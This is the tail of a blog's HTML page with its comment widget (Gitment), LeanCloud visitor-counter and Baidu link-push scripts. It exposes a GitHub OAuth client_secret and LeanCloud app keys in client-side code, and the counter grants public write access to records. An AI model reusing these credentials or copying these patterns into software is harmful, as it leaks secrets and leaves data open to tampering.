|
|
|||
|
<script type="text/javascript">
|
|||
|
function renderGitment(){
|
|||
|
var gitment = new Gitment({
|
|||
|
id: window.location.pathname,
|
|||
|
owner: 'Cool-Y',
|
|||
|
repo: 'gitment-comments',
|
|||
|
|
|||
|
oauth: {
|
|||
|
|
|||
|
|
|||
|
client_secret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
|
|||
|
|
|||
|
client_id: '180955a2c3ae3d966d9a'
|
|||
|
}});
|
|||
|
gitment.render('gitment-container');
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
renderGitment();
|
|||
|
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
|
|||
|
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
|
|||
|
<script>
|
|||
|
function showTime(Counter) {
|
|||
|
var query = new AV.Query(Counter);
|
|||
|
var entries = [];
|
|||
|
var $visitors = $(".leancloud_visitors");
|
|||
|
|
|||
|
$visitors.each(function () {
|
|||
|
entries.push( $(this).attr("id").trim() );
|
|||
|
});
|
|||
|
|
|||
|
query.containedIn('url', entries);
|
|||
|
query.find()
|
|||
|
.done(function (results) {
|
|||
|
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
|
|||
|
|
|||
|
if (results.length === 0) {
|
|||
|
$visitors.find(COUNT_CONTAINER_REF).text(0);
|
|||
|
return;
|
|||
|
}
|
|||
|
|
|||
|
for (var i = 0; i < results.length; i++) {
|
|||
|
var item = results[i];
|
|||
|
var url = item.get('url');
|
|||
|
var time = item.get('time');
|
|||
|
var element = document.getElementById(url);
|
|||
|
|
|||
|
$(element).find(COUNT_CONTAINER_REF).text(time);
|
|||
|
}
|
|||
|
for(var i = 0; i < entries.length; i++) {
|
|||
|
var url = entries[i];
|
|||
|
var element = document.getElementById(url);
|
|||
|
var countSpan = $(element).find(COUNT_CONTAINER_REF);
|
|||
|
if( countSpan.text() == '') {
|
|||
|
countSpan.text(0);
|
|||
|
}
|
|||
|
}
|
|||
|
})
|
|||
|
.fail(function (object, error) {
|
|||
|
console.log("Error: " + error.code + " " + error.message);
|
|||
|
});
|
|||
|
}
|
|||
|
|
|||
|
function addCount(Counter) {
|
|||
|
var $visitors = $(".leancloud_visitors");
|
|||
|
var url = $visitors.attr('id').trim();
|
|||
|
var title = $visitors.attr('data-flag-title').trim();
|
|||
|
var query = new AV.Query(Counter);
|
|||
|
|
|||
|
query.equalTo("url", url);
|
|||
|
query.find({
|
|||
|
success: function(results) {
|
|||
|
if (results.length > 0) {
|
|||
|
var counter = results[0];
|
|||
|
counter.fetchWhenSave(true);
|
|||
|
counter.increment("time");
|
|||
|
counter.save(null, {
|
|||
|
success: function(counter) {
|
|||
|
var $element = $(document.getElementById(url));
|
|||
|
$element.find('.leancloud-visitors-count').text(counter.get('time'));
|
|||
|
},
|
|||
|
error: function(counter, error) {
|
|||
|
console.log('Failed to save Visitor num, with error message: ' + error.message);
|
|||
|
}
|
|||
|
});
|
|||
|
} else {
|
|||
|
var newcounter = new Counter();
|
|||
|
/* Set ACL */
|
|||
|
var acl = new AV.ACL();
|
|||
|
acl.setPublicReadAccess(true);
|
|||
|
acl.setPublicWriteAccess(true);
|
|||
|
newcounter.setACL(acl);
|
|||
|
/* End Set ACL */
|
|||
|
newcounter.set("title", title);
|
|||
|
newcounter.set("url", url);
|
|||
|
newcounter.set("time", 1);
|
|||
|
newcounter.save(null, {
|
|||
|
success: function(newcounter) {
|
|||
|
var $element = $(document.getElementById(url));
|
|||
|
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
|
|||
|
},
|
|||
|
error: function(newcounter, error) {
|
|||
|
console.log('Failed to create');
|
|||
|
}
|
|||
|
});
|
|||
|
}
|
|||
|
},
|
|||
|
error: function(error) {
|
|||
|
console.log('Error:' + error.code + " " + error.message);
|
|||
|
}
|
|||
|
});
|
|||
|
}
|
|||
|
|
|||
|
$(function() {
|
|||
|
var Counter = AV.Object.extend("Counter");
|
|||
|
if ($('.leancloud_visitors').length == 1) {
|
|||
|
addCount(Counter);
|
|||
|
} else if ($('.post-title-link').length > 1) {
|
|||
|
showTime(Counter);
|
|||
|
}
|
|||
|
});
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
<script>
|
|||
|
(function(){
|
|||
|
var bp = document.createElement('script');
|
|||
|
var curProtocol = window.location.protocol.split(':')[0];
|
|||
|
if (curProtocol === 'https') {
|
|||
|
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
|
|||
|
}
|
|||
|
else {
|
|||
|
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
|
|||
|
}
|
|||
|
var s = document.getElementsByTagName("script")[0];
|
|||
|
s.parentNode.insertBefore(bp, s);
|
|||
|
})();
|
|||
|
</script>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
</body>
|
|||
|
</html>
|